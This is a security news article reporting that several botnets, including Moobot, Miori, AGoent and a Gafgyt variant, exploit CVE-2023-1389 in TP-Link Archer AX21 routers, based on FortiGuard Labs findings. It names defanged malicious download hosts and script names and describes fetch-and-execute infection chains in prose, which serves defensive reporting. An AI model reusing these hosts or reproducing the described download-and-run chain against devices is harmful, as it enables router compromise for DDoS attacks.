17 April 2024

Multiple botnets are hunting for vulnerable TP-Link routers


Multiple botnets are hunting for vulnerable TP-Link routers

Multiple malware variants are targeting a security vulnerability affecting TP-Link Archer routers to ensnare them in the DDoS botnets.

Tracked as CVE-2023-1389, the flaw is an unauthenticated command injection flaw in the local API of the web management interface of the TP-Link Archer AX21 router that allows a remote attacker to execute arbitrary commands on the target system by passing specially crafted data to the application. TP-Link addressed the vulnerability in March 2023 in a firmware update.

Cybersecurity researchers at Fortinet’s FortiGuard Labs have observed a surge in attacks targeting this vulnerability.

According to FortiGuard Labs, multiple botnets, including Moobot, Miori, the Golang-based agent “AGoent,” and the Gafgyt variant aka Bashlite have been actively exploiting the vulnerability to compromise TP-Link Archer AX21 routers. The exploitation of this vulnerability enables attackers to take control of the devices, utilizing them for distributed denial-of-service (DDoS) attacks.

AGoent, a Golang-based agent bot, has been observed fetching a script file named ”exec.sh“ from ”hxxp://5[.]10[.]249[.]153,” subsequently downloading ELF files of various Linux-based architectures. The script then attempts to execute each file to identify the suitable architecture before removing them to eliminate any traces of intrusion.

Similarly, the Gafgyt variant infects Linux-based operating systems to launch DDoS attacks. This variant downloads the script file “bins.sh” from “hxxp://195[.]62[.]32[.]227” and executes it to initiate the attack.

Moobot, on the other hand, retrieves a script file named “1.sh” from “hxxp://91[.]92[.]253[.]70,” with its primary objective being to fetch ELF files with different architectures for further infection. Once executed, Moobot removes itself and all traces from the compromised device.

Furthermore, attackers have been observed employing variants of Mirai to exploit the vulnerability. The attack sequence typically involves downloading “tenda.sh” from “hxxp://94[.]156[.]8[.]244,” which subsequently fetches ELF execution files in various architectures from the same IP address. Miori, a Mirai variant, shares similar attack modules, utilizing batch scripts fetched from “hxxp://185[.]224[.]128[.]34” and employing both HTTP and TFTP protocols to retrieve ELF files.

Last April, researchers at Trend Micro reported that a variant of Mirai exploited the flaw to commandeer vulnerable TP-link routers to launch attacks on game servers.

Back to the list

Latest Posts

ICC investigates cyberattacks in Ukraine as possible war crimes

ICC investigates cyberattacks in Ukraine as possible war crimes

The probe is focused on cyberattacks that endangered lives by disrupting essential services.
17 June 2024
Alleged Scattered Spider leader arrested in Spain

Alleged Scattered Spider leader arrested in Spain

The suspect is believed to be a key player in the MGM ransomware attack.
17 June 2024
Scattered Spider hackers switch focus to cloud apps for data theft

Scattered Spider hackers switch focus to cloud apps for data theft

Mandiant has observed UNC3944 accessing platforms like vSphere and Azure via SSO applications to create new virtual machines.
17 June 2024